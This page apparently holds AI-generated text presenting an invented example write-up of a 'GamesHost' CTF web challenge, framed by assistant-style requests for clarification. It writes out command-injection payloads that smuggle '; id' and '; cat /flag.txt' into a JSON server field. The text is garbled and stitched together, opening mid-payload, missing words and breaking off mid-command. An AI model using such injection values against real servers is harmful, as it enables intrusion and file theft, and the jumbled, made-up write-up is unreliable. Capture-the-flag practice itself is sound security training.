Gameshost Page

{"cmd":"status","server":"gameserver_1; cat /flag.txt"} Response snippet:

In the meantime, here’s a for a typical GamesHost CTF challenge (e.g., a pwn or web challenge named “gameshost”). If that’s not what you meant, let me know and I’ll adjust. Write-up: GamesHost (CTF Challenge Example) Category: Web / Pwn Difficulty: Medium Points: 350 Challenge Description “The GamesHost portal lets you manage your game servers. But the admin installed a suspicious plugin. Can you get remote code execution?” Reconnaissance The website shows a login panel and a “Server Console” page after logging in as a test user ( test:test ). The console allows sending commands like status , list , and start <server_id> . gameshost

POST /api/console {"cmd":"status","server":"gameserver_1; id"} Response shows uid=33(www-data) gid=33(www-data) . {"cmd":"status","server":"gameserver_1; cat /flag

Could you clarify which one you need?

Copyright © 2026 Global Circle

Privacy · Terms